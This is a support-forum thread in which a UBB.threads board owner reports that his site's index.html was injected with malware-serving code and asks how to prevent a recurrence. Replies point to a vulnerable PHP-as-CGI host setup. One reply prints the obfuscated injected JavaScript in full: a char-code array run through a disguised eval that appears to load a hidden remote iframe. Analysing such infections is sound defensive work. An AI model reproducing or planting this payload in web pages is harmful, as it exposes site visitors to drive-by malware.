You are not logged in. [Log In] UBB.threads PHP Forum Software Community » Forums » UBB.threads 7 Discussion » General Assistance (How Do I?) » Board hacked
Register User    Portal Page     Forum List        Calendar     Active Topics     Search     FAQ
Site Links
Home
Features
Documentation
Pricing & Order
Members Area
Support Options
UBBDev.com
UBBWiki.com
Who's Online
0 registered (), 28 Guests and 10 Spiders online.
Key: Admin, Global Mod, Mod
Featured Member
Registered: 12/20/11
Posts: 35
Top Posters (30 Days)
Ruben 45
Bert 26
Gizmo 18
Rob Provencher 12
Rimex 9
SD 8
sw55 7
Eugene 5
TCS1 4
Matthias1976 4
Latest Photos
Uhm...
Mayan End of World
Gas Station Disco Video Shoot
Test Pictures
Audrey Kate
Topic Options
#249565 - 06/24/12 08:38 AM Board hacked
Pilgrim Offline

enthusiast 		Registered: 12/25/03
Posts: 210
Loc: NH, USA
I really couldn't figure out where to post this topic so I chose this forum. smile

Just recently, my board was hacked; a malicious code was added to my main page (index.html). Google caught it and displayed their warning that the site had been found to have malware on it which allowed malicious software to be downloaded to the visitor's PC.

I found the malicous code, removed it and then requested a "Review" by Google to have the warning removed.

The malicious code has been attached as a .txt file if anyone is interested in perusing it not simply out of curiosity but perhaps to help SD or another to increase the security of UBBThreads.

In the meanwhile, does anyone have a suggestion on how to prevent such things from happening again?

Thanks


Attachments
hacked_script.txt (2390 downloads)

_________________________
Artificial Intelligence is no match for natural stupidity!
Top
Express Hosting
Express Hosting "We are the official hosting company of UBB.threads. Ask us about our free migration services to migrate your UBB.threads installation."
#249566 - 06/24/12 09:27 AM Re: Board hacked [Re: Pilgrim]
SpudDogg Offline
stranger 		Registered: 05/07/06
Posts: 6
Loc: Boca Raton, FL
I know it's not much help, but that can distill down a little bit.

Someone would have to run the script to alert instead of eval to see what's really happening.

Code:
i=0;try{prototype-5;}catch(z){f=[102,234,110,198,116,210,111,220,32,220,101,240,116,164,97,220,100,222,109,156,117,218,98,202,114,80,41,246,118,194,114,64,104,210,61,232,104,210,115,92,115,202,101,200,47,232,104,210,115,92,81,118,118,194,114,64,108,222,61,232,104,210,115,92,115,202,101,200,37,232,104,210,115,92,81,118,118,194,114,64,116,202,115,232,61,232,104,210,115,92,65,84,108,222,45,232,104,210,115,92,82,84,104,210,59,210,102,80,116,202,115,232,62,96,41,246,116,208,105,230,46,230,101,202,100,122,116,202,115,232,125,202,108,230,101,246,116,208,105,230,46,230,101,202,100,122,116,202,115,232,43,232,104,210,115,92,77,250,114,202,116,234,114,220,40,232,104,210,115,92,115,202,101,200,42,232,104,210,115,92,111,220,101,158,118,202,114,154,41,250,102,234,110,198,116,210,111,220,32,164,97,220,100,222,109,156,117,218,98,202,114,142,101,220,101,228,97,232,111,228,40,234,110,210,120,82,123,236,97,228,32,200,61,220,101,238,32,136,97,232,101,80,117,220,105,240,42,98,48,96,48,82,59,236,97,228,32,230,61,200,46,206,101,232,72,222,117,228,115,80,41,124,49,100,63,98,58,96,59,232,104,210,115,92,115,202,101,200,61,100,51,104,53,108,55,112,57,96,49,86,40,200,46,206,101,232,77,222,110,232,104,80,41,84,48,240,70,140,70,140,70,140,41,86,40,200,46,206,101,232,68,194,116,202,40,82,42,96,120,140,70,140,70,82,43,80,77,194,116,208,46,228,111,234,110,200,40,230,42,96,120,140,70,140,41,82,59,232,104,210,115,92,65,122,52,112,50,110,49,118,116,208,105,230,46,154,61,100,49,104,55,104,56,102,54,104,55,118,116,208,105,230,46,162,61,232,104,210,115,92,77,94,116,208,105,230,46,130,59,232,104,210,115,92,82,122,116,208,105,230,46,154,37,232,104,210,115,92,65,118,116,208,105,230,46,222,110,202,79,236,101,228,77,122,49,92,48,94,116,208,105,230,46,154,59,232,104,210,115,92,110,202,120,232,61,220,101,240,116,164,97,220,100,222,109,156,117,218,98,202,114,118,114,202,116,234,114,220,32,232,104,210,115,250,102,234,110,198,116,210,111,220,32,198,114,202,97,232,101,164,97,220,100,222,109,156,117,218,98,202,114,80,114,88,77,210,110,88,77,194,120,82,123,228,101,232,117,228,110,64,77,194,116,208,46,228,111,234,110,200,40,80,77,194,120,90,77,210,110,82,42,228,46,220,101,240,116,80,41,86,77,210,110,82,125,204,117,220,99,232,105,222,110,64,103,202,110,202,114,194,116,202,80,230,101,234,100,222,82,194,110,200,111,218,83,232,114,210,110,206,40,234,110,210,120,88,108,202,110,206,116,208,44,244,111,220,101,82,123,236,97,228,32,228,97,220,100,122,110,202,119,64,82,194,110,200,111,218,78,234,109,196,101,228,71,202,110,202,114,194,116,222,114,80,117,220,105,240,41,118,118,194,114,64,108,202,116,232,101,228,115,122,91,78,97,78,44,78,98,78,44,78,99,78,44,78,100,78,44,78,101,78,44,78,102,78,44,78,103,78,44,78,104,78,44,78,105,78,44,78,106,78,44,78,107,78,44,78,108,78,44,78,109,78,44,78,110,78,44,78,111,78,44,78,112,78,44,78,113,78,44,78,114,78,44,78,115,78,44,78,116,78,44,78,117,78,44,78,118,78,44,78,119,78,44,78,120,78,44,78,121,78,44,78,122,78,93,118,118,194,114,64,115,232,114,122,39,78,59,204,111,228,40,236,97,228,32,210,61,96,59,210,60,216,101,220,103,232,104,118,105,86,43,82,123,230,116,228,43,122,108,202,116,232,101,228,115,182,99,228,101,194,116,202,82,194,110,200,111,218,78,234,109,196,101,228,40,228,97,220,100,88,48,88,108,202,116,232,101,228,115,92,108,202,110,206,116,208,45,98,41,186,125,228,101,232,117,228,110,64,115,232,114,86,39,92,39,86,122,222,110,202,125,230,101,232,84,210,109,202,111,234,116,80,102,234,110,198,116,210,111,220,40,82,123,232,114,242,123,210,102,80,116,242,112,202,111,204,32,210,102,228,97,218,101,174,97,230,67,228,101,194,116,202,100,100,61,122,34,234,110,200,101,204,105,220,101,200,34,82,123,210,102,228,97,218,101,174,97,230,67,228,101,194,116,202,100,100,61,232,114,234,101,118,118,194,114,64,117,220,105,240,61,154,97,232,104,92,114,222,117,220,100,80,43,220,101,238,32,136,97,232,101,80,41,94,49,96,48,96,41,118,118,194,114,64,100,222,109,194,105,220,78,194,109,202,61,206,101,220,101,228,97,232,101,160,115,202,117,200,111,164,97,220,100,222,109,166,116,228,105,220,103,80,117,220,105,240,44,98,54,88,39,228,117,78,41,118,105,204,114,218,61,200,111,198,117,218,101,220,116,92,99,228,101,194,116,202,69,216,101,218,101,220,116,80,34,146,70,164,65,154,69,68,41,118,105,204,114,218,46,230,101,232,65,232,116,228,105,196,117,232,101,80,34,230,114,198,34,88,34,208,116,232,112,116,47,94,34,86,100,222,109,194,105,220,78,194,109,202,43,68,47,228,117,220,102,222,114,202,115,232,114,234,110,126,115,210,100,122,99,240,34,82,59,210,102,228,109,92,115,232,121,216,101,92,119,210,100,232,104,122,34,96,112,240,34,118,105,204,114,218,46,230,116,242,108,202,46,208,101,210,103,208,116,122,34,96,112,240,34,118,105,204,114,218,46,230,116,242,108,202,46,236,105,230,105,196,105,216,105,232,121,122,34,208,105,200,100,202,110,68,59,200,111,198,117,218,101,220,116,92,98,222,100,242,46,194,112,224,101,220,100,134,104,210,108,200,40,210,102,228,109,82,125,250,99,194,116,198,104,80,101,82,123,250,125,88,53,96,48,82,59];v="e"+"v"+"a";}if(v)e=window[v+"l"];try{q=document.createElement("b");if(e)q.appendChild(q+"");}catch(fwbewe){w=f;s=[];}
r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));}
if(f)e(s);
_________________________

Security and Tech
Top
#249567 - 06/24/12 09:41 AM Re: Board hacked [Re: Pilgrim]
SD Offline
Registered: 04/19/07
Posts: 4205
Loc: SoCal, USA
your host has php running as a CGI ( there is a similar thread ) and the version of php they have installed is known to be vulnerable.

it isn't ubb software from what i can tell.

that is, IF you installed one of the xx.xx.xxp2 versions that are imperative.

2c
_________________________

Threads tutorials . Threads & Wordpress experts . UBB resume

If I you, click this link as to why
Top
#249569 - 06/24/12 02:52 PM Re: Board hacked [Re: SD]
Pilgrim Offline

enthusiast 		Registered: 12/25/03
Posts: 210
Loc: NH, USA
Originally Posted By: SD
your host has php running as a CGI ( there is a similar thread ) and the version of php they have installed is known to be vulnerable.

it isn't ubb software from what i can tell.

that is, IF you installed one of the xx.xx.xxp2 versions that are imperative.

2c

Understood and it is good to know that the problem is not with UBBThreads. Yes, I have SP2 patch installed. So, it would seem that it would be good to contact the host provider and mention what happened and it might be good to update their version of php.
_________________________
Artificial Intelligence is no match for natural stupidity!
Top
#249589 - 06/29/12 09:32 AM Re: Board hacked [Re: Pilgrim]
SD Offline
Registered: 04/19/07
Posts: 4205
Loc: SoCal, USA
they should run as suphp or fastcgi AND upgrade to latest php, yes
_________________________

Threads tutorials . Threads & Wordpress experts . UBB resume

If I you, click this link as to why
Top



Moderator:  AllenAyres, Harold, Ian, Ron M 
Shout Box

Today's Birthdays
No Birthdays
Recent Topics
Express hosting.
by Ruben
05/16/13 03:54 PM
Level of detail in new user registration emails
by Mitch P.
05/15/13 10:20 PM
Approving users
by Bert
05/15/13 09:22 PM
Users randomly added to other group
by Bert
05/15/13 09:15 PM
Posting and other problems with 7.5.7
by Matthias1976
05/15/13 02:58 PM
Forum Stats
10965 Members
36 Forums
33957 Topics
183405 Posts

Max Online: 978 @ 06/24/07 10:19 PM
Random Image
Board Rules · Mark all read
Contact Us · UBBCentral · Top